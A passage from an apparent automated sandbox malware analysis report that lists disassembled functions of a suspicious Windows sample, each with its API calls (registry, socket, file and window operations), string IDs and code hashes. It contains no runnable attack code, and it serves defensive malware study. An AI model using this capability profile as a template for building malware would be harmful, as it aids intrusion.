                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: 6464d0dd1c169827cfc8de99a43be554cf352e4c1d25428c7c2397481fb3d111
                                            • Instruction ID: e3c334dec90e1b6026ce3f00bfc7cd4042a955f171476167c1069dd203e5f414
                                            • Opcode Fuzzy Hash: 6464d0dd1c169827cfc8de99a43be554cf352e4c1d25428c7c2397481fb3d111
                                            • Instruction Fuzzy Hash: E851F4A05047D53DFB3683288C45BBABFA95B06308F08D5C9E1DCAA8C3D394EC98E751
                                            Function 00E7589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcsncpy$LocalTime
                                            • String ID:
                                            • API String ID: 2945705084-0
                                            • Opcode ID: 64d74632da25c396a6ab9aa7cd52c3d63733268b0d698a2e775e7eb2b1b190cf
                                            • Instruction ID: e6fa9b66fcf5d051ec9feab64cbd5bac6b1a50da8586cda97064a8cf1118a401
                                            • Opcode Fuzzy Hash: 64d74632da25c396a6ab9aa7cd52c3d63733268b0d698a2e775e7eb2b1b190cf
                                            • Instruction Fuzzy Hash: 6941A4A6C20528B6CB11EBB5888A9CF77F89F04310F50E966F618F3121E634E754C7E5
                                            Function 00E6DA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E6DAC5
                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E6DAFB
                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E6DB0C
                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E6DB8E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                            • String ID: ,,$DllGetClassObject
                                            • API String ID: 753597075-2867008933
                                            • Opcode ID: e66ed2fa4175eac1c9d2779bfb1bc0122bf5816bb11ce80e9faf4f645a952268
                                            • Instruction ID: e3223c2190eb335d6e20662d76c69ecf6e427f67e2060d341fc9bfa12d6e1d7d
                                            • Opcode Fuzzy Hash: e66ed2fa4175eac1c9d2779bfb1bc0122bf5816bb11ce80e9faf4f645a952268
                                            • Instruction Fuzzy Hash: 1F41C671A44204DFDB14CF15DC84A9A7BA9EF84390F5550AEED05EF209D7B1DD44CB90
                                            Function 00E738AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E738D3,?), ref: 00E748C7
                                              • Part of subcall function 00E748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E738D3,?), ref: 00E748E0
                                            • lstrcmpiW.KERNEL32(?,?), ref: 00E738F3
                                            • _wcscmp.LIBCMT ref: 00E7390F
                                            • MoveFileW.KERNEL32(?,?), ref: 00E73927
                                            • _wcscat.LIBCMT ref: 00E7396F
                                            • SHFileOperationW.SHELL32(?), ref: 00E739DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                            • String ID: \*.*
                                            • API String ID: 1377345388-1173974218
                                            • Opcode ID: b3dc1939e77c1983cc93160a51149f67e63e9835a1b7df1365d0efd716a2636a
                                            • Instruction ID: ec61cc22dad8746436bdfb41ccbdf084f295a8013e1d1943b75feb8be28059e9
                                            • Opcode Fuzzy Hash: b3dc1939e77c1983cc93160a51149f67e63e9835a1b7df1365d0efd716a2636a
                                            • Instruction Fuzzy Hash: 6A4182B25083449EC752EF74C445ADFB7E8AF88340F04692EF589E3151EB74D688C752
                                            Function 00E97500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E97519
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E975C0
                                            • IsMenu.USER32(?), ref: 00E975D8
                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E97620
                                            • DrawMenuBar.USER32 ref: 00E97633
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                            • String ID: 0
                                            • API String ID: 3866635326-4108050209
                                            • Opcode ID: e7fc31d0f1e6ff1f09684e5f19bc2ecc468d54c96099748afdfe07b502954a55
                                            • Instruction ID: d51e54b7d70822a0454269a0b619ecb211d9cea59232f09f2ee07b08f031cbd3
                                            • Opcode Fuzzy Hash: e7fc31d0f1e6ff1f09684e5f19bc2ecc468d54c96099748afdfe07b502954a55
                                            • Instruction Fuzzy Hash: 1B415674A14608EFDF20DF55D884E9ABBF8FB08314F04902AED95A7291D730AD58CFA0
                                            Function 00E9122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E9125C
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E91286
                                            • FreeLibrary.KERNEL32(00000000), ref: 00E9133D
                                              • Part of subcall function 00E9122D: RegCloseKey.ADVAPI32(?), ref: 00E912A3
                                              • Part of subcall function 00E9122D: FreeLibrary.KERNEL32(?), ref: 00E912F5
                                              • Part of subcall function 00E9122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E91318
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E912E0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                            • String ID:
                                            • API String ID: 395352322-0
                                            • Opcode ID: 5cb02f5ef61982ded2e55cf4d0a756186e06744af2922ba6a9b36ba84696367a
                                            • Instruction ID: a30dd88961be3e00c32b263dee6667e007e2e6312dd0030a8e18c499fa069040
                                            • Opcode Fuzzy Hash: 5cb02f5ef61982ded2e55cf4d0a756186e06744af2922ba6a9b36ba84696367a
                                            • Instruction Fuzzy Hash: 44310F71A0111ABFDF15DB91DC85AFEB7BCEF08304F0011AAE515F2151D6745E499AA0
                                            Function 00E9653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E9655B
                                            • GetWindowLongW.USER32(01044E28,000000F0), ref: 00E9658E
                                            • GetWindowLongW.USER32(01044E28,000000F0), ref: 00E965C3
                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E965F5
                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E9661F
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00E96630
                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E9664A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LongWindow$MessageSend
                                            • String ID:
                                            • API String ID: 2178440468-0
                                            • Opcode ID: 0a127c7ae47ca8147688e89fb16cdafb0abafe94a85e0eb2c47d6ec7acf49619
                                            • Instruction ID: 42cfbf1229c210f76acca9058d7f16d66493de91a813799a03037777e7b4cc7f
                                            • Opcode Fuzzy Hash: 0a127c7ae47ca8147688e89fb16cdafb0abafe94a85e0eb2c47d6ec7acf49619
                                            • Instruction Fuzzy Hash: 0F310234604210AFDF208F1AEC84F553BE1FB4A358F1A11AAF501EB2B6CB61AC44DB81
                                            Function 00E86486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E880CB
                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E864D9
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E864E8
                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E86521
                                            • connect.WSOCK32(00000000,?,00000010), ref: 00E8652A
                                            • WSAGetLastError.WSOCK32 ref: 00E86534
                                            • closesocket.WSOCK32(00000000), ref: 00E8655D
                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E86576
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                            • String ID:
                                            • API String ID: 910771015-0
                                            • Opcode ID: 274b7223b4ab0aa71d424d9d82dfed91363fbcaeebd1a25aa1d0c9670449066f
                                            • Instruction ID: b3e3e2d8d00ecd74b6b49545fa3f39d941ac98d544a4c8cfc5b0df3e34cc46f6
                                            • Opcode Fuzzy Hash: 274b7223b4ab0aa71d424d9d82dfed91363fbcaeebd1a25aa1d0c9670449066f
                                            • Instruction Fuzzy Hash: C9319071600218AFDB10AF64DC85BBE7BA9EB44714F04402AF90EF7291DB74AD48CBA1
                                            Function 00E6E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E6E0FA
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E6E120
                                            • SysAllocString.OLEAUT32(00000000), ref: 00E6E123
                                            • SysAllocString.OLEAUT32 ref: 00E6E144
                                            • SysFreeString.OLEAUT32 ref: 00E6E14D
                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00E6E167
                                            • SysAllocString.OLEAUT32(?), ref: 00E6E175
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                            • String ID:
                                            • API String ID: 3761583154-0
                                            • Opcode ID: 2a20803376dff2514a6e1e8a19bf6996f0d85a7c9743d902594db662e41cbfa9
                                            • Instruction ID: 3d08e48b286fffa90505cb513e84fbfda8415ce378b5004e2679c653327a33cc
                                            • Opcode Fuzzy Hash: 2a20803376dff2514a6e1e8a19bf6996f0d85a7c9743d902594db662e41cbfa9
                                            • Instruction Fuzzy Hash: BE219835645108AFDF109FA9DC88CAB77ECEB097A0B108136F915EB3A1DA70DC45DB64
                                            Function 00E9783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E11D73
                                              • Part of subcall function 00E11D35: GetStockObject.GDI32(00000011), ref: 00E11D87
                                              • Part of subcall function 00E11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E11D91
                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E978A1
                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E978AE
                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E978B9
                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E978C8
                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E978D4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$CreateObjectStockWindow
                                            • String ID: Msctls_Progress32
                                            • API String ID: 1025951953-3636473452
                                            • Opcode ID: 731a54fee84dcc3e8ed56cd7cdf8319294e3ba2773dad06c2c0d36712a9c36d2
                                            • Instruction ID: b1b4e474e60375a4909ad97b29bf2e31b42fd617a11b292f5bcafe1286e16660
                                            • Opcode Fuzzy Hash: 731a54fee84dcc3e8ed56cd7cdf8319294e3ba2773dad06c2c0d36712a9c36d2
                                            • Instruction Fuzzy Hash: 501190B2110219BFEF159F60CC85EEB7F6DEF08798F015115FA44A2090C7729C21DBA0
                                            Function 00E341C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E34292,?), ref: 00E341E3
                                            • GetProcAddress.KERNEL32(00000000), ref: 00E341EA
                                            • EncodePointer.KERNEL32(00000000), ref: 00E341F6
                                            • DecodePointer.KERNEL32(00000001,00E34292,?), ref: 00E34213
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                            • String ID: RoInitialize$combase.dll
                                            • API String ID: 3489934621-340411864
                                            • Opcode ID: 6fac065ceef3e6f3345e657251bf76770ecac11a71e9eed04c9bc9f36f5717a1
                                            • Instruction ID: 14a056511076c6ba523931228334e7ac65af011b34725f6cc02eae65798896ab
                                            • Opcode Fuzzy Hash: 6fac065ceef3e6f3345e657251bf76770ecac11a71e9eed04c9bc9f36f5717a1
                                            • Instruction Fuzzy Hash: 40E0EDF0592300AFDB106B76EC0DB043A94AB25706F506426F551F50F0DBB550998E00
                                            Function 00E3429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E341B8), ref: 00E342B8
                                            • GetProcAddress.KERNEL32(00000000), ref: 00E342BF
                                            • EncodePointer.KERNEL32(00000000), ref: 00E342CA
                                            • DecodePointer.KERNEL32(00E341B8), ref: 00E342E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                            • String ID: RoUninitialize$combase.dll
                                            • API String ID: 3489934621-2819208100
                                            • Opcode ID: dab2ec2b59f99b7809b37f2974bb6d8b3c8975e5fc8a8f312c9481bbf8a23cb9
                                            • Instruction ID: 3810ea45792b7b082fc18161cb3d1c081a4aaf2df80bbfb525123c95efea5016
                                            • Opcode Fuzzy Hash: dab2ec2b59f99b7809b37f2974bb6d8b3c8975e5fc8a8f312c9481bbf8a23cb9
                                            • Instruction Fuzzy Hash: 7BE092B8583311AFEA109B66FC0DB093BA4FB25B46F10503BF111F50F0CBB4A588CA14
                                            Function 00E7675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$__itow__swprintf
                                            • String ID:
                                            • API String ID: 3253778849-0
                                            • Opcode ID: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
                                            • Instruction ID: 0a6081c66ce0f54f0ab6fb4a8606efd47cc03ae878d328200e53c3e26ce26efc
                                            • Opcode Fuzzy Hash: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
                                            • Instruction Fuzzy Hash: 0961F23050465A9BDF15EF20CC96EFE3BE4AF88308F04A559F95A7B192DB309D41CB51
                                            Function 00E9046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E90038,?,?), ref: 00E910BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E90548
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E90588
                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E905AB
                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E905D4
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E90617
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E90624
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                            • String ID:
                                            • API String ID: 4046560759-0
                                            • Opcode ID: ccb91d2f218a226c5a800118a65f074f53948ae276a03e6aeb30f9dfcdc02386
                                            • Instruction ID: ae08230827a7a9cb155773d9b73e536c39908345b31b5b2fad7a8760c7b89777
                                            • Opcode Fuzzy Hash: ccb91d2f218a226c5a800118a65f074f53948ae276a03e6aeb30f9dfcdc02386
                                            • Instruction Fuzzy Hash: AD515C31208200AFCB14EF54C885EAFBBE9FF88714F44595EF595A72A2DB31E944CB52
                                            Function 00E95A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetMenu.USER32(?), ref: 00E95A82
                                            • GetMenuItemCount.USER32(00000000), ref: 00E95AB9
                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E95AE1
                                            • GetMenuItemID.USER32(?,?), ref: 00E95B50
                                            • GetSubMenu.USER32(?,?), ref: 00E95B5E
                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E95BAF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$Item$CountMessagePostString
                                            • String ID:
                                            • API String ID: 650687236-0
                                            • Opcode ID: a5d3ebd4c2b5e308eb366fb0bc64e8b2d023ec0ef41a8d93c4ac537ddd830918
                                            • Instruction ID: 79f7d3126f79c9febe138368ef047915f669b92e5f68b85087dca98732eb214c
                                            • Opcode Fuzzy Hash: a5d3ebd4c2b5e308eb366fb0bc64e8b2d023ec0ef41a8d93c4ac537ddd830918
                                            • Instruction Fuzzy Hash: F2515B32A00615EFCF16AFA4C855AAEBBF5EF48310F10546AE916B7251DB70AE418B90
                                            Function 00E6F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 00E6F3F7
